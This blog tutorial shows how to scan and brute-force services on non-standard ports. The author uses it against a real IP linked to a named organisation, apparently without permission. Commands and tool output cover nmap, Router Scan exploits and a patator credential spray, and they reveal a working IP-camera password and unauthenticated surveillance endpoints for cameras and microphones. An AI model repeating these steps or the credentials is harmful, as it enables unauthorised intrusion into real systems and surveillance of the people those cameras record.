How to search and brute force services on non-standard ports
If you are wondering where I took the IP address that will participate in the examples of this article, then I took it from the access logs of the web server.
Someone, apparently, tried to brute-force the site:
HTTP Requests for DoS attack against the website:
193.232.100.234 - - [16/Mar/2019:01:52:24 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=11cc8 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690388964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1a774 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690389978 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1f50e HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690450965 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fcfa HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690451964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fc40 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools 193.232.100.234 - - [16/Mar/2019:01:55:29 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690512973 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
I’m writing “apparently”, as I’m not completely sure – the hosting equipment itself does not let more than a few requests per second, and for the site long time ago this IP has been blocked by an automatic script for too many requests. That is, incoming requests for at least the last couple of weeks (the time access logs are stored) come and receive 403 errors in response – that is, they do not have any significant influence on the server load. That’s why I noticed this activity only a few weeks later.
Regardless of whether a program went mad or someone went mad, we have the IP address 193.232.100.234 and the moral right for our small investigation. But just a little. Right quite a bit. We will not even touch anything. Just see who it is, that’s all…
Let's try to get hostname by IP:
dig -x 193.232.100.234
And:
nslookup 193.232.100.234
Since there is no PTR record for this host, we have not received any data.
Sometimes results can be obtained by searching for sites on the same IP, as well as from Securitytrails.
The first service gave us a hostname:
- lk.repropark.ru
Check that the host lk.repropark.ru is really bind to the IP address under investigation:
dig +short lk.repropark.ru 193.232.100.234
Securitytrails also led to lk.repropark.ru, and already this host told about the existence of the mailsrvnew.repropark.ru and meet.repropark.ru hosts.
So, there are hosts
- lk.repropark.ru (193.232.100.234)
- mailsrvnew.repropark.ru (IP is not installed at this time)
- meet.repropark.ru (193.232.100.237)
- repropark.ru (195.208.0.16)
Since this is a site of a factory (sort of), it turns out that the DoS attack was carried out either by:
a) someone else who has already hacked the servers of this organization and uses them for their own purposes
b) the system administrator of this company who went mad
How to define services on non-standard ports
Perform a full port scan along with a collection of service banners:
sudo nmap -p- -sV --script=banner 193.232.100.234
We get the following result:
Nmap scan report for 193.232.100.234 Host is up (0.092s latency). Not shown: 65135 filtered ports, 354 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_banner: 220 (vsFTPd 3.0.3) 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4 25/tcp open smtp? | fingerprint-strings: | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: | 452 syntax error (connecting) | syntax error (connecting) | Hello, Help, Kerberos, LPDString, SSLSessionReq, TLSSessionReq: | 452 syntax error (connecting) | SIPOptions: | 452 syntax error (connecting) | syntax error (connecting) | syntax error (connecting) | syntax error (connecting) |_ many errors 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) 211/tcp open ftp vsftpd 3.0.2 |_banner: 220 (vsFTPd 3.0.2) 212/tcp open ftp Microsoft ftpd |_banner: 220 Microsoft FTP Service 443/tcp open ssl/http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) 1723/tcp open pptp MikroTik (Firmware: 1) 5010/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3 5013/tcp open ssl/fmpro-v6? 5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later | xmpp-info: | STARTTLS Failed | info: | compression_methods: | | features: | | stream_id: 6oytos41yv | unknown: | | errors: | invalid-namespace | (timeout) | xmpp: | server name: chatsrv | version: 1.0 | auth_mechanisms: | |_ capabilities: 7211/tcp open ftp vsftpd 3.0.2 |_banner: 220 (vsFTPd 3.0.2) 7443/tcp open ssl/http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) 8000/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 8880/tcp open http Apache httpd 2.2.25 ((Win32)) |_http-server-header: Apache/2.2.25 (Win32) 9090/tcp open http Jetty 9780/tcp open unknown 9786/tcp open http Devline Line surveillance system httpd |_http-server-header: Devline Linia Server 9977/tcp open http Boa httpd 9978/tcp open http Boa httpd 9979/tcp open http Boa httpd 9980/tcp open http Boa httpd 9981/tcp open http Boa httpd 9982/tcp open http Boa httpd 9983/tcp open http Boa httpd 9984/tcp open http Boa httpd 9985/tcp open http Boa httpd 9986/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9987/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9988/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9989/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9990/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9991/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9992/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9993/tcp open http lighttpd |_http-server-header: dcs-lig-httpd 9994/tcp open http lighttpd |_http-server-header: dcs-lig-httpd 9995/tcp open http lighttpd |_http-server-header: dcs-lig-httpd 9996/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9997/tcp open http Boa HTTPd 0.94.13 |_http-server-header: Boa/0.94.13 9998/tcp open http lighttpd (D-Link DCS IP camera) |_http-server-header: dcs-lig-httpd 17789/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u4 19777/tcp open ssl/unknown 19781/tcp open ssl/unknown 19782/tcp open ssl/unknown 19887/tcp open ssl/unknown 19889/tcp open ssl/unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=3/17%Time=5C8E6552%P=x86_64-unknown-linux-gnu%r SF:(Hello,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Help,1F,"45 SF:2\x20syntax\x20error\x20\(connecting\)\r\n")%r(GenericLines,3E,"452\x20 SF:syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connec SF:ting\)\r\n")%r(GetRequest,3E,"452\x20syntax\x20error\x20\(connecting\)\ SF:r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(HTTPOptions,3E,"452 SF:\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(co SF:nnecting\)\r\n")%r(RTSPRequest,3E,"452\x20syntax\x20error\x20\(connecti SF:ng\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(SSLSessionReq, SF:1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(TLSSessionReq,1F," SF:452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Kerberos,1F,"452\x20sy SF:ntax\x20error\x20\(connecting\)\r\n")%r(FourOhFourRequest,3E,"452\x20sy SF:ntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecti SF:ng\)\r\n")%r(LPDString,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n SF:")%r(LDAPSearchReq,3E,"452\x20syntax\x20error\x20\(connecting\)\r\n452\ SF:x20syntax\x20error\x20\(connecting\)\r\n")%r(SIPOptions,91,"452\x20synt SF:ax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecting SF:\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20erro SF:r\x20\(connecting\)\r\n421\x20too\x20many\x20errors\r\n"); Service Info: Host: MikroTik; OSs: Unix, Linux, Windows; Devices: security-misc, webcam; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1000.83 seconds
Not a host, but some kind of Christmas tree! There is:
- 2 or 3 web servers (ports 80, 443 (HTTPS), 8880 and 7443 (also HTTPS))
- 4 SSH servers (ports 22, 5010, 8000 and 17789)
- 4 FTP servers (ports 21, 211, 212, 7211)
- Openfire, Version: 4.0.3 on port 9090
- HTTP server on port 9780 that did not accept any connection attempts
- HTTP server on port 9786, which offers to download the Flash player, judging by the file http://193.232.100.234:9786/lang.json (found based on the analysis of the source code), is related to the video surveillance system ru.devline.tv (Devline Linia Server (Devline))
- Many Boa and lighttpd HTTP servers on ports 9977, 9978, 9979, 9980, 9981 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998
I googled – Boa is a simple HTTP server for hardware like webcams.
For port 9998, it is written that this is a D-Link DCS IP camera.
There are some quite incomprehensible ports.
Apparently, this is a router or a computer on which port forwarding is anabled to other devices located on the local network is configured.
How to use Router Scan by Stas’M on non-standard ports
The equipment on ports 9977, 9978, 9979, 9980, 9981 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998 is some sort of appliances like routers or IP cameras.
To check them, you can use RouterSploit or Router Scan by Stas’M.
By default, Router Scan scans three popular web ports 80, 8080 and 1080. But in our case, all the ports are different, so I need to change the port settings. This can be done in the GUI or (which is faster if there are many ports), in the ports.txt file, which lies in the root folder of the Router Scan, enter the required ports – one port per line.
Run the scan:
For the three devices, the exploits is workable and we know their username and password: admin:njhufib
I looked – this is really an IP camera.
There is no njhufib password in the Router Scan dictionary, so even if other devices for which there was no working exploit have the same password, Router Scan cannot verify this.
How to brut-force services on non-standard ports
To check whether the found credentials are suitable for devices on other ports, we will use the wonderful program for bruteforce, its is patator.
In the options we will need to specify the type of authentication, so to start we need to find it out. This can be done with a command like:
curl -v HOST:PORT
In the results of which you need to look at the headers.
For example:
curl -v 193.232.100.234:9977
Displays:
* Trying 193.232.100.234... * TCP_NODELAY set * Connected to 193.232.100.234 (193.232.100.234) port 9977 (#0) > GET / HTTP/1.1 > Host: 193.232.100.234:9977 > User-Agent: curl/7.64.0 > Accept: */* > * HTTP 1.0, assume close after body < HTTP/1.0 401 Unauthorized < Date: Tue, 19 Mar 2019 04:34:45 GMT < Connection: close < WWW-Authenticate: Basic realm="DCS-2103" < Content-Length: 0 < Content-Type: text/html; charset=ISO-8859-1 < * Closing connection 0
We look at the line containing WWW-Authenticate: Basic – so, Basic authentication is used.
In case of a failed login, an error code of 401 (Unauthorized) is returned.
We compose the command:
patator http_fuzz url=http://193.232.100.234:FILE0 0=ports.txt auth_type=basic user_pass=admin:njhufib -x ignore:code=401 -x ignore,retry:code=500
Where:
- http_fuzz – means to use the http_fuzz module, which is used for brute-force the basic | digest | ntlm authentication, brute-force web authentication, search for hidden files and folders. Perhaps it can still be used for anything – the patator is a super flexible program.
- url=http://193.232.100.234:FILE0 – means that the URL is the http://193.232.100.234: string, after which (as we see, after a colon), the values from file 0 (FILE0) are substituted. If you forget, ports are indicated through a colon, that is, the same IP address will be taken as a host, but with different ports
- 0=ports.txt – means that the file with the number 0 is named ports.txt. I recall that the data from this file are substituted as ports. I just borrowed the ports.txt file from Router Scan.
- auth_type=basic – Basic is set as the authentication method
- user_pass=admin:njhufib – specifies the username and password, I use a static pair of admin:njhufib
- -x ignore:code=401 – means to ignore (not display) attempts for which the error code was 401 (Access denied)
- -x ignore,retry:code=500 – means to ignore (not to display) attempts for which the error code was 500 (a problem on the server), but at the same time try the same login and password again.
We get:
07:35:23 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-19 07:35 MSK 07:35:23 patator INFO - 07:35:23 patator INFO - code size:clen time | candidate | num | mesg 07:35:23 patator INFO - ----------------------------------------------------------------------------- 07:35:23 patator INFO - 200 2855:2727 0.242 | 9983 | 7 | HTTP/1.1 200 OK 07:35:23 patator INFO - 200 2855:2727 0.239 | 9984 | 8 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2785:2657 0.250 | 9990 | 14 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2785:2657 0.227 | 9991 | 15 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2785:2657 0.227 | 9992 | 16 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2593:2378 0.233 | 9993 | 17 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2591:2378 0.232 | 9994 | 18 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2593:2378 0.232 | 9995 | 19 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2785:2657 0.235 | 9997 | 21 | HTTP/1.1 200 OK 07:35:24 patator INFO - 200 2593:2378 0.239 | 9998 | 22 | HTTP/1.1 200 OK 07:35:25 patator INFO - Hits/Done/Skip/Fail/Size: 10/22/0/0/22, Avg: 10 r/s, Time: 0h 0m 2s
We look at the candidate column – this pair of passwords successfully approached another ten hosts on other ports:
- 9983
- 9984
- 9990
- 9991
- 9992
- 9993
- 9994
- 9995
- 9997
- 9998
By inertia, almost reflexively, I began to clear the ports.txt file from the ports of those hosts for whom the passwords are already known, in order to start brute force in the dictionary for the remaining 12 ports – but then I reminded myself, we were only going to look – who this. And I did not do that. But it is not necessary to see video from all IP cameras of this organization…
How to open Devline Linia Server (Devline) without Flash
There were some problems with http://193.232.100.234:9786/ - I couldn’t find a web browser that still supports Flash … (I run Linux). I guessed to start a virtual machine with Windows and opened this address in Internet Explorer, this is what Devline Linia Server (Devline) looks like:
You may ask, what kind of password you need to enter – you do not need to enter a password… Just open the address and see… Perhaps it was intended …
User is web, password - <blank line>. To make it easier for the boss to remember?
IT department – perhaps from here a DoS attack was carried out…
Since Flash is a rather ancient technology, there is a chance that the Flash application is quite simple and you can get access to cameras without an Internet Explorer browser. You can decompile the file with Flash, but, in my opinion, it is even easier to understand the principles of its work by analysis of network activity.
Analysis of Flash application network activity
Already probably not even everyone will understand what Flash is. This is a powerful technology that greatly expanded the capabilities of web browsers in the past, and it was very popular. And now, due to the lack of support in browsers, it is almost forgotten. Therefore, quite briefly about the analysis of Flash applications in Wireshark.
Since Flash works in a browser, this program sends regular HTTP requests. For analysis, it is enough to capture traffic and use the filter in Wireshark:
http
By the way, see "Wireshark Filters".
There it turned out everything is trivially simple – requests are made to addresses of the form:
- http://193.232.100.234:9786/cameras
- http://193.232.100.234:9786/microphones
- http://193.232.100.234:9786/users/web
Basic authentication is used there.
The returned XML document contains relative links to videos and photos, for example, http://193.232.100.234:9786/cameras/2/video, http://193.232.100.234:9786/cameras/23/video, and so on.
Why Flash here if everything could be done using JavaScript and HTML5 technology? Apparently, the front-end was written about fifteen years ago and the developer who did it, quited and now no one can remake… The devline company itself, judging from the price list on the official website, is alive.
Conclusion
And, perhaps, enough with them. Why one of the factory employees has run DoS attack against my website? I do not know. Apparently, he has too much free time at work.
Surveillance cameras or specially assembled in a hub and displayed for open access, or configured as something really quite deliberately wrong – you don’t need not only a password, you don’t even need to enter a username to view them – perhaps this is done for everyone to see which a perfect factory exists…
Well, in this article we learned how to find and define services, even if they work on unusual ports. We learned how to work with Router Scan by Stas'M and patator on non-standard ports. Considered the analysis of network activity of a very simple application.
Related articles:
- How to search subdomains and build graphs of network structure with Amass (57.2%)
- Best Kali Linux tools in WSL (Windows Subsystem for Linux) (Part 1) (57.2%)
- SMB and Samba Security Audit Tools (55.3%)
- badKarma: Advanced Network Reconnaissance Assistant (53.4%)
- How to discover subdomains without brute-force (53.4%)
- Hashcat doesn't detect AMD CPUs (SOLVED) (RANDOM - 3.4%)
Hi Alex,
https://miloserdov.org/?p=2287 is not accesssible